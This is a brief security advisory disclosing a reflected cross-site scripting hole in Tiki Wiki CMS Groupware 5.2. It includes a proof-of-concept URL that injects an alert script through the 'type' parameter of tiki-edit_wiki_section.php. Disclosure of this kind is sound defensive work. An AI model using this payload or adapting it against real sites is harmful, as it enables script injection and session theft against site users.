Home
Consulting
Advisories
Software
Articles
Contact

Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Tiki Wiki CMS Groupware 5.2 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC